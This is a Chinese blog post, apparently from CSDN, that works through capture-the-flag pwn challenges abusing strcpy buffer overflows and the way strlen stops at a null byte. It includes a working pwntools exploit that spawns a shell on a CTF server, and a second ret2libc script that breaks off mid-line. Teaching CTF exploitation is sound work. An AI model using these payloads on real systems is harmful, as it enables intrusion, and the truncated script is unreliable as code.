strcpy,srtcmp,strlen函数漏洞利用

于 2024-07-07 23:54:21 发布
阅读量138 收藏
点赞数 3
文章标签: 算法 宽度优先
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44624290/article/details/140254847
版权

strcpy,srtcmp,strlen函数漏洞利用

strcpy

  1. strcpy函数用于将字符串复制到另一个指针指向的空间中,遇到空字符 **b’x\00’**时停止,:

    image-20240531103615735

  2. 所以可以利用 strcpy不检查缓冲区 的漏洞(构造的字符串要以\0结尾),进行缓冲区溢出攻击:

    例子:BUUCTF在线评测 (buuoj.cn)

    1. main函数中提供了4个函数供使用:

      image-20240531104018597

    2. 其中addlog函数进行输入,输入的长度位128个字符,调试观察他的栈上返回值(0x80488ec)在变量的上方,无法进行溢出,因此该函数只能作为输入:

      image-20240531104402495

      image-20240531104108026

    3. 后买你getflag函数中存在一个strcpy函数漏洞,可能可以进行栈溢出,动态调试观察其栈上的变化,可见只要 字符串长度超过0x4c 即可覆盖掉 getflag函数的返回值 ,在出去时即可挟持函数的控制流:

      image-20240531105005891

      image-20240531104533809

    4. 利用addlog函数输入构造的payload,长度超过0x4c即可,先只需要system函数地址,和’bin/sh/'字符串的地址即可,system函数程序自带,查询一下字符串:

      image-20240531105324125

    5. EXP:

      from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')

p=remote("node5.buuoj.cn",28321)
elf=ELF('./ciscn_2019_ne_5')

p.recvuntil(b'Please input admin password:')
payload = b'administrator'
p.sendline(payload)
p.recvuntil(b':')
p.sendline(b'1')
p.recv()

#获取system地址
sys_addr=elf.sym['system']
sh_addr = 0x080482ea
print(hex(sys_addr))

#填充32位b'aaaa',作为system的返回值(不需要使用到,所以随便填)
payload = b'a'*(0x4c)+p32(sys_addr)+b'aaaa'+p32(sh_addr)+b'\x00'
p.sendline(payload)
p.recvuntil(b':')
p.sendline(b'4')
p.interactive()

      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20
      • 21
      • 22
      • 23
      • 24
      • 25
      • 26
      • 27
    strlen

    题目:[LitCTF 2023]狠狠的溢出涅~ | NSSCTF

    1. ida查看,题目给了一个栈溢出漏洞,虽然给了0x200的长度,但是后面用户strlen检查了输入的长度不能超过0x50,溢出长度明显不够。

    2. 但是可以利用strlen函数判断字符串时以 b’\x00’ 结尾,可以用b’\x00’绕过strlen的判断,EXP:

      from pwn import *
from LibcSearcher import *
# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.anna.nssctf.cn",28314)
# p = process("./pwn4")
elf = ELF('./pwn4')
#获取got、plt地址
got = elf.got['puts']
plt = elf.plt['puts']
print(hex(got),hex(plt))

#获取传参地址
pop_rdi_ret = 0x00000000004007d3
main_addr = 0x0000000000
Ρause
关注
【C语言】strcpy函数的缺点
Vcrossover的博客
03-12 492
用法 这是C语言里面复制字符串的库函数, 函数声明包括在专门处理字符串的头文件<string.h>中: char * strcpy( char * dst, const char * src ); 这个函数把字符串src复制到一分配好的字符串空间dst中,复制的时候包括标志字符串结尾的空字符一起复制。操作成功,返回dst,否则返回NULL. 需要注意的问题 函数里的局部变量一般都是按序排放的,并且因为是分配在堆栈之中,它们的地址是向下“增长”,即向低地址方向增长。比如下面的程序: int
【C语言】strcpy()函数
热门推荐
weixin_47970952的博客
08-04 16万+
strcpy()函数:是将一个字符串复制到另一块空间地址中 的函数,‘\0’是停止拷贝的终止条件,同时也会将 '\0' 也复制到目标空间。本文介绍了strcpy函数的具体使用以及需要注意的事项。
C语言strlen函数的缺陷与实现,strcpy函数的缺陷与实现,strcat函数的缺陷与实现,strcmp的实现。
cccyi7的博客
06-17 842
C语言strlen函数的缺陷与实现,strcpy函数的缺陷与实现,strcat函数的缺陷与实现,strcmp的实现。C语言常用库函数的模拟实现和使用。
strlen 返回值的漏洞
qq_41071646的博客
12-31 2911
strlen 是一个统计字符串长度的函数  然后我们这次说的题 就是 关于strlen 返回值 造成 溢出的问题 在32的系统中 有这么一种情况   strlen 的结果的返回值给8位寄存器al  那么8位最多是多少? 255  如果我们 多输入会怎么办 我们如果输入257  二进制是多少呢 ‭000100000001‬  这个应该是没有什么好说的  那么假如我们输入了 257个字符 那么最后...
strlen与unsigned的隐藏bug
weixin_43919430的博客
12-09 409
unsigned int a=0; a-=1; printf("%d", a ); 结果输出为4294967295,原因就是溢出了BUT! strlen的返回值为unsigned int 型,因此编程的时候一定要想到这个。
strcpy漏洞分析
17岁boy的博客
05-21 1672
前段时间发现一个有趣的代码: char str[1]; strcpy(str, "wwwwwwwwwwwwwwwwwwwww"); printf("%s", str); getchar();运行结果:大家可以看到,我使用strcpy向一个长度为1的数组赋一个长度为21的字符,并且被赋值了,还被打印了出来!那么下面来解释一下为什么会产生这样的原因!在CPU看来内存是连续的,是一组线性的地址空...
C语言: 自定义封装strlen,strcat,srtcmpstrcpy函数 (while循环实现)
最新发布
weixin_56095071的博客
08-07 298
1>strlen() 字符串长度的计算返回值为unsigned int 的长度2>strcmp(字符串1 字符串2) 两个字符串的比较。返回值>1: 字符串1大返回值strcpy() 字符串的拷贝返回值:第一个字符串的首地址4>strcat() 字符串的拼接返回值:第一个字符串的首地址。
C语言程序设计-用函数实现字符串的复制, 不允许用strcpy()函数.c
10-31
C语言程序设计-用函数实现字符串的复制, 不允许用strcpy()函数.c
浅谈C语言中strcpy,strcmp,strlen,strcat函数原型
08-30
在C语言中,字符串处理是非常常见的一项任务,而`strcpy`、`strcmp`、`strlen`和`strcat`这四个函数则是C语言标准库中的基本字符串操作函数。它们分别用于字符串的复制、比较、长度获取和连接。 1. `strcpy`函数: ...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
《基础知识——strcpystrlen
安徒生木槿
07-18 990
strlen() 和 strcpy()函数的区别 这两个一个是返回一个C风格字符串的长度,一个是对一个C风格字符串的拷贝,两个本来功能上是不同的,此外,他们还有一些细小的区别:strlen("hello")返回的结果是5,是不包含字符串结尾处的‘\0’,但是strcpy(str1,str2),会拷贝str2中的‘\0’。 【补充】(C字符串——库函数系列(strlen、strca...
为什么C语言的strcpy函数漏洞?
神经网络爱好者
06-23 2266
为什么C语言的strcpy函数漏洞?document.title="为什么C语言的strcpy函数漏洞? - "+document.title         来源:ChinaITLab 收集整理  前言:研究了几天DOS下的溢出原理,最后明白了其实原理都很简单关键是要懂得为什么C语言的strcpy函数漏洞,为什么对这个函数的不正常使用会造成溢出。    一节:介绍strcpy函数
C之有趣-strlen()函数引发的一场“血案”
Leonard's Blog
08-13 455
亲爱的小伙伴们,大家都知道strlen()函数是求字符串长度的一款利器啊! 举个例子:int *str=”China”; 该字符串在内存中是这样的:C h i n a \0
php+strncmp+漏洞,PHP中strncmp()函数比较两个字符串前2个字符是否相等的方法
weixin_35761245的博客
03-23 107
本文实例讲述了PHP中strncmp()函数比较两个字符串前2个字符是否相等的方法。分享给大家供大家参考,具体如下:PHP中的strncmp()函数用于比较两个字符串(区分大小写),可判断两个字符串前n个字符是否相等。strncmp()函数定义如下:strncmp(string1,string2,length)参数说明:string1必需。规定要比较的首个字符串。string2必需。规定要比较的第...
无意中发现的strncmp()
花园王国---Garden kingdom
10-09 620
//±È½Ï×Ö·û´® // // u8 my_strncmp(u8 *string1,u8 *string2,size_t count) { u8 res,k=1;     while(*string1!='\0'&&*string2!='\0'&&k     {         k++;     if(*string1==*string2)     {       
c语言------小漏洞
qq_62414152的博客
04-14 794
`# include<stdio.h> include<string.h> int main(){ char str[20]; gets(str); str[11] = ‘\0’; puts(str); char ss[20]; ss[0] = 2; //ss = str; 数组不能这么操作 }` # include<stdio.h> # include<string.h> int main(){ char str[3]; gets(str); /
C语言中字符串函数后隐藏的危险陷阱
窗外云天的专栏
05-23 5741
C语言最强大的功能就是它的指针。有一句话说的很好:如果你爱编程,那么就会爱C语言,如果你爱C语言,你一定会爱指针。C语言的指针确实强大,随心所欲的修改内存给程序员提供了自由的发挥空间。但是C语言对缓冲区溢出不做检查,使得这种随心所欲的指针操作变得极度危险。内存泄漏,缓冲区溢出等问题往往是程序员们焦头烂额,深受其害。因为这些问题时隐时现,出现问题的地方也许跟问题一点关系都没有,非常难以调试。有时身经
LitCTF PWN题解
ctfpwn的博客
06-02 623
接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式。然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。咳咳,接下来是正题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值